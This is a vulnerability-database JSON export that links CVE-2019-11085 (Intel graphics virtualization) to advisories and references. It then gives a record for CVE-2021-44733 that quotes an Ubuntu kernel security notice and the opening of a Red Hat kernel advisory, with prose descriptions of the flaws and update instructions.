        "title": "INTEL-SA-00245 - Intel UniteR Client for Android* Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00245.html"
      },
      {
        "title": "INTEL-SA-00204 - Intel IntelR PROSet/Wireless WiFi Software Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00204.html"
      },
      {
        "title": "INTEL-SA-00213 - IntelR CSME, IntelR SPS, IntelR TXE, IntelR DAL, and IntelR AMT 2019.1 QSR Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00213.html"
      },
      {
        "title": "INTEL-SA-00251 - IntelR NUC Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00251.html"
      },
      {
        "title": "INTEL-SA-00218 - IntelR Graphics Driver for Windows* 2019.1 QSR Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00218.html"
      },
      {
        "title": "INTEL-SA-00252 - IntelR Driver \u0026 Support Assistant Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00252.html"
      },
      {
        "title": "INTEL-SA-00223 - Intel 2019.1 QSR UEFI Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00223.html"
      },
      {
        "title": "INTEL-SA-00228 - Intel UniteR Client Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00228.html"
      },
      {
        "title": "INTEL-SA-00233 - Microarchitectural Data Sampling Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00233.html"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191873 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191971 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20200592 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191891 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel-rt security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20200609 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20191959 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20200543 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-hwe, linux-gcp vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4068-2"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-gcp, linux-kvm, linux-oracle, linux-raspi2, linux-snapdragon vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4068-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-aws vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4118-1"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/intel-fixes-critical-high-severity-flaws-across-several-products/144940/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00249.html"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/108488"
      },
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11085"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4068-2/"
      },
      {
        "trust": 1.7,
        "url": "https://support.f5.com/csp/article/k09376613"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00071.html"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/4068-1/"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/errata/rhsa-2019:1873"
      },
      {
        "trust": 1.3,
        "url": "https://access.redhat.com/security/cve/cve-2019-11085"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2019:1971"
      },
      {
        "trust": 1.2,
        "url": "https://usn.ubuntu.com/4118-1/"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:0543"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2020:0609"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00048.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:1891"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2019:1959"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2020:0592"
      },
      {
        "trust": 0.9,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/drivers/gpu/drm/i915/gvt/kvmgt.c?id=51b00d8509dc69c98740da2ad07308b630d3eb7d"
      },
      {
        "trust": 0.9,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1710405"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu92328381/index.html"
      },
      {
        "trust": 0.8,
        "url": "https://mdsattacks.com/files/ridl.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://mdsattacks.com/files/fallout.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://zombieloadattack.com/"
      },
      {
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/architecture-and-technology/mds.html"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11085"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu92328381/"
      },
      {
        "trust": 0.8,
        "url": "https://jvndb.jvn.jp/ja/contents/2019/jvndb-2019-003441.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191674-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191671-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191668-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191530-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191529-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191532-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191536-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1103505"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1103493"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/1103499"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191550-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191535-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191534-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191533-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191527-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-201914089-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://usn.ubuntu.com/4069-1/"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191581-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.suse.com/support/update/announcement/2019/suse-su-20191588-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2171/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0693/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/153719/ubuntu-security-notice-usn-4068-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156405/red-hat-security-advisory-2020-0543-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156527/red-hat-security-advisory-2020-0592-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2256/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0549/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2753/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2231/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2155/"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.4,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20856"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11599"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17133"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14895"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20976"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11811"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-11811"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20784"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11599"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20856"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/4309211"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16871"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16871"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-16884"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1037.39~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11884"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-55.60~16.04.2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11815"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4068-2"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11833"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4068-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-16862"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14610"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4118-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14616"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13098"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13093"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20169"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14614"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14611"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11487"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13053"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-19985"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1047.49"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14612"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10639"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-10638"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13099"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20511"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13100"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0136"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-14617"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1047.49~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5383"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2019-11810"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-11810"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2018-20784"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "PACKETSTORM",
        "id": "156405"
      },
      {
        "db": "PACKETSTORM",
        "id": "153789"
      },
      {
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153828"
      },
      {
        "db": "PACKETSTORM",
        "id": "156548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "PACKETSTORM",
        "id": "156405"
      },
      {
        "db": "PACKETSTORM",
        "id": "153789"
      },
      {
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153828"
      },
      {
        "db": "PACKETSTORM",
        "id": "156548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-05-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "date": "2019-05-14T00:00:00",
        "db": "BID",
        "id": "108488"
      },
      {
        "date": "2019-05-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "date": "2019-06-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "date": "2020-02-18T15:07:36",
        "db": "PACKETSTORM",
        "id": "156405"
      },
      {
        "date": "2019-07-29T18:57:17",
        "db": "PACKETSTORM",
        "id": "153789"
      },
      {
        "date": "2019-07-23T19:32:11",
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "date": "2019-09-03T16:47:23",
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "date": "2019-07-30T18:54:20",
        "db": "PACKETSTORM",
        "id": "153828"
      },
      {
        "date": "2020-02-26T17:02:22",
        "db": "PACKETSTORM",
        "id": "156548"
      },
      {
        "date": "2019-05-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "date": "2019-05-17T16:29:03.063000",
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-05-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "date": "2019-05-14T00:00:00",
        "db": "BID",
        "id": "108488"
      },
      {
        "date": "2019-05-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "date": "2019-06-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "date": "2020-02-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "date": "2019-05-31T12:29:01.547000",
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Intel Multiple vulnerabilities in the product",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Input Validation Error",
    "sources": [
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      }
    ],
    "trust": 0.9
  }
}

var-202112-1696
Vulnerability from variot

A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object. ========================================================================== Ubuntu Security Notice USN-5368-1 April 06, 2022

linux-azure-5.13, linux-oracle-5.13 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems - linux-oracle-5.13: Linux kernel for Oracle Cloud systems

Details:

It was discovered that the BPF verifier in the Linux kernel did not properly restrict pointer types in certain situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-23222)

It was discovered that the network traffic control implementation in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-1055)

Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. A local attacker could use this to gain administrative privileges. (CVE-2022-0492)

J\xfcrgen Gro\xdf discovered that the Xen subsystem within the Linux kernel did not adequately limit the number of events driver domains (unprivileged PV backends) could send to other guest VMs. An attacker in a driver domain could use this to cause a denial of service in other guest VMs. (CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)

J\xfcrgen Gro\xdf discovered that the Xen network backend driver in the Linux kernel did not adequately limit the amount of queued packets when a guest did not process them. An attacker in a guest VM can use this to cause a denial of service (excessive kernel memory consumption) in the network backend domain. (CVE-2021-28714, CVE-2021-28715)

Szymon Heidrich discovered that the USB Gadget subsystem in the Linux kernel did not properly restrict the size of control requests for certain gadget types, leading to possible out of bounds reads or writes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-39685)

It was discovered that a race condition existed in the poll implementation in the Linux kernel, resulting in a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-39698)

It was discovered that the simulated networking device driver for the Linux kernel did not properly initialize memory in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-4135)

Eric Biederman discovered that the cgroup process migration implementation in the Linux kernel did not perform permission checks correctly in some situations. A local attacker could possibly use this to gain administrative privileges. (CVE-2021-4197)

Brendan Dolan-Gavitt discovered that the aQuantia AQtion Ethernet device driver in the Linux kernel did not properly validate meta-data coming from the device. A local attacker who can control an emulated device can use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-43975)

It was discovered that the ARM Trusted Execution Environment (TEE) subsystem in the Linux kernel contained a race condition leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-44733)

It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)

It was discovered that the eBPF verifier in the Linux kernel did not properly perform bounds checking on mov32 operations. A local attacker could use this to expose sensitive information (kernel pointer addresses). (CVE-2021-45402)

It was discovered that the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel did not properly deallocate memory in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45480)

It was discovered that the BPF subsystem in the Linux kernel did not properly track pointer types on atomic fetch operations in some situations. A local attacker could use this to expose sensitive information (kernel pointer addresses). (CVE-2022-0264)

It was discovered that the TIPC Protocol implementation in the Linux kernel did not properly initialize memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2022-0382)

Samuel Page discovered that the Transparent Inter-Process Communication (TIPC) protocol implementation in the Linux kernel contained a stack-based buffer overflow. A remote attacker could use this to cause a denial of service (system crash) for systems that have a TIPC bearer configured. (CVE-2022-0435)

It was discovered that the KVM implementation for s390 systems in the Linux kernel did not properly prevent memory operations on PVM guests that were in non-protected mode. A local attacker could use this to obtain unauthorized memory write access. (CVE-2022-0516)

It was discovered that the ICMPv6 implementation in the Linux kernel did not properly deallocate memory in certain situations. A remote attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2022-0742)

It was discovered that the IPsec implementation in the Linux kernel did not properly allocate enough memory when performing ESP transformations, leading to a heap-based buffer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-27666)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.13.0-1021-azure 5.13.0-1021.24~20.04.1 linux-image-5.13.0-1025-oracle 5.13.0-1025.30~20.04.1 linux-image-azure 5.13.0.1021.24~20.04.10 linux-image-oracle 5.13.0.1025.30~20.04.1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-5368-1 CVE-2021-28711, CVE-2021-28712, CVE-2021-28713, CVE-2021-28714, CVE-2021-28715, CVE-2021-39685, CVE-2021-39698, CVE-2021-4135, CVE-2021-4197, CVE-2021-43975, CVE-2021-44733, CVE-2021-45095, CVE-2021-45402, CVE-2021-45480, CVE-2022-0264, CVE-2022-0382, CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-1055, CVE-2022-23222, CVE-2022-27666

Package Information: https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security, bug fix, and enhancement update Advisory ID: RHSA-2022:1988-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:1988 Issue date: 2022-05-10 CVE Names: CVE-2020-0404 CVE-2020-4788 CVE-2020-13974 CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 CVE-2021-21781 CVE-2021-26401 CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 CVE-2021-43056 CVE-2021-43389 CVE-2021-43976 CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 CVE-2022-0322 CVE-2022-1011 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

Security Fix(es):

  • kernel: fget: check that the fd still exists after getting a ref to it (CVE-2021-4083)

  • kernel: avoid cyclic entity chains due to malformed USB descriptors (CVE-2020-0404)

  • kernel: speculation on incompletely validated data on IBM Power9 (CVE-2020-4788)

  • kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c (CVE-2020-13974)

